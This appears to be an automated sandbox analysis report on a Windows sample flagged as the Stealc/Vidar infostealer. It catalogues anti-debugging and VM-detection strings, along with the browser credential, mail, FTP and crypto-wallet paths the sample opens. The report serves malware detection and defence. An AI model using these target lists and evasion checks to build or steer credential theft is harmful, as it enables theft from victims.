Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_001038B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000FED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_000FED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00104570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00104570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000FDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_000FDE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F1160 GetSystemInfo,ExitProcess,

0_2_000F1160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1939228904.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1939228904.0000000000D33000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1939228904.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13231
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13234
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-14421
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13246
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13254
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13286

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000F45C0 VirtualProtect ?,00000004,00000100,00000000

0_2_000F45C0

Source: C:\Users\user\Desktop\file.exe

0_2_00109860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00109750 mov eax, dword ptr fs:[00000030h]

0_2_00109750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00107850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00107850

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00109600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00109600

Source: file.exe, file.exe, 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: l*~\|Program Manager
Source: file.exe, 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ol*~\|Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00107B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00106920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00106920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00107850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00107850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00107A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00107A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1711129405.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1939228904.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.1939228904.0000000000D33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\.finger-print.fpCs>D`n
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.1939228904.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.A49c

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1711129405.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1939228904.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	335 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	641 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	42%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
